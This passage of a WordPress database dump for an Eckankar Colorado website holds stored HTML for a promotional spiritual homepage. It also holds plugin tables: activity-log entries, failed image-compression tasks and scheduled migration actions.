class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242894,41186,'_message_key','post_updated'),(242895,41186,'_user_id','2'),(242896,41186,'_user_login','S8zhaBda'),(242897,41186,'_user_email','nada@zipnadanot.org'),(242898,41186,'_server_remote_addr','76.130.120.x'),(242899,41186,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(242900,41187,'post_type','attachment'),(242901,41187,'attachment_id','269402'),(242902,41187,'attachment_title','winter-misty trees-2'),(242903,41187,'attachment_filename','winter-misty-trees-2.jpg'),(242904,41187,'attachment_mime','image/jpeg'),(242905,41187,'attachment_filesize','563552'),(242906,41187,'_message_key','attachment_created'),(242907,41187,'_user_id','2'),(242908,41187,'_user_login','S8zhaBda'),(242909,41187,'_user_email','nada@zipnadanot.org'),(242910,41187,'_server_remote_addr','76.130.120.x'),(242911,41187,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(242912,41188,'_user_id','2'),(242913,41188,'_user_login','S8zhaBda'),(242914,41188,'_user_email','nada@zipnadanot.org'),(242915,41188,'_message_key','user_logged_out'),(242916,41188,'_server_remote_addr','76.130.120.x'),(242917,41188,'_server_http_referer','https://eckankar-colorado.org/wp-admin/themes.php?page=simple-custom-css.php');
/*!40000 ALTER TABLE `wpcl_simple_history_contexts` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_simple_history_contexts` with 30830 row(s)
--

--
-- Table structure for table `wpcl_tm_tasks`
--

DROP TABLE IF EXISTS `wpcl_tm_tasks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_tm_tasks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `type` varchar(300) NOT NULL,
  `class_identifier` varchar(300) DEFAULT '0',
  `attempts` int(11) DEFAULT 0,
  `description` varchar(300) DEFAULT NULL,
  `time_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `last_locked_at` bigint(20) DEFAULT 0,
  `status` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=972 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_tm_tasks`
--

LOCK TABLES `wpcl_tm_tasks` WRITE;
/*!40000 ALTER TABLE `wpcl_tm_tasks` DISABLE KEYS */;
INSERT INTO `wpcl_tm_tasks` VALUES (934,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 269011, autocreated on : September 07, 2023 03:28:53','2023-09-07 15:28:53',0,'failed'),(929,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 268994, autocreated on : September 06, 2023 04:33:06','2023-09-06 16:33:06',0,'failed'),(932,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 269000, autocreated on : September 06, 2023 04:44:54','2023-09-06 16:44:54',0,'failed'),(931,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 268998, autocreated on : September 06, 2023 04:39:42','2023-09-06 16:39:42',0,'failed'),(928,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 268992, autocreated on : September 06, 2023 04:28:59','2023-09-06 16:28:59',0,'failed'),(959,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 269327, autocreated on : November 02, 2023 08:37:02','2023-11-02 20:37:02',0,'failed'),(961,2,'smush','Re_Smush_It_Task',2,'Re_Smush_It_Task with attachment ID : 269331, autocreated on : November 02, 2023 11:01:47','2023-11-02 23:01:47',0,'failed'),(950,2,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task with attachment ID : 269263, autocreated on : October 25, 2023 08:24:07','2023-10-25 20:24:07',0,'failed');
/*!40000 ALTER TABLE `wpcl_tm_tasks` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_tm_tasks` with 8 row(s)
--

--
-- Table structure for table `wpcl_actionscheduler_actions`
--

DROP TABLE IF EXISTS `wpcl_actionscheduler_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_actionscheduler_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `hook` varchar(191) NOT NULL,
  `status` varchar(20) NOT NULL,
  `scheduled_date_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `scheduled_date_local` datetime DEFAULT '0000-00-00 00:00:00',
  `args` varchar(191) DEFAULT NULL,
  `schedule` longtext DEFAULT NULL,
  `group_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `attempts` int(11) NOT NULL DEFAULT 0,
  `last_attempt_gmt` datetime DEFAULT '0000-00-00 00:00:00',
  `last_attempt_local` datetime DEFAULT '0000-00-00 00:00:00',
  `claim_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `extended_args` varchar(8000) DEFAULT NULL,
  PRIMARY KEY (`action_id`),
  KEY `hook` (`hook`),
  KEY `status` (`status`),
  KEY `scheduled_date_gmt` (`scheduled_date_gmt`),
  KEY `args` (`args`),
  KEY `group_id` (`group_id`),
  KEY `last_attempt_gmt` (`last_attempt_gmt`),
  KEY `claim_id` (`claim_id`),
  KEY `claim_id_status_scheduled_date_gmt` (`claim_id`,`status`,`scheduled_date_gmt`)
) ENGINE=MyISAM AUTO_INCREMENT=261395 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_actionscheduler_actions`
--

LOCK TABLES `wpcl_actionscheduler_actions` WRITE;
/*!40000 ALTER TABLE `wpcl_actionscheduler_actions` DISABLE KEYS */;
INSERT INTO `wpcl_actionscheduler_actions` VALUES (261385,'action_scheduler/migration_hook','complete','2023-11-12 04:00:38','2023-11-11 21:00:38','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1699761638;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1699761638;}',2,1,'2023-11-12 04:00:41','2023-11-11 21:00:41',0,NULL),(261383,'action_scheduler/migration_hook','failed','2023-10-25 19:26:19','2023-10-25 13:26:19','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698261979;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698261979;}',2,1,'2023-10-25 19:26:29','2023-10-25 13:26:29',0,NULL),(261382,'action_scheduler/migration_hook','complete','2023-10-25 19:24:15','2023-10-25 13:24:15','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698261855;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698261855;}',2,1,'2023-10-25 19:25:19','2023-10-25 13:25:19',0,NULL),(261381,'action_scheduler/migration_hook','failed','2023-10-24 16:04:30','2023-10-24 10:04:30','[]','O:30:\"ActionScheduler_SimpleSchedule\":2:{s:22:\"\0*\0scheduled_timestamp\";i:1698163470;s:41:\"\0ActionScheduler_SimpleSchedule\0timestamp\";i:1698163470;}',2,1,'2023-10-24 16:04:40','2023-10-24 10:04:40',0,NULL),(261380,'action_scheduler/migration_hook','complete','2023-10-24 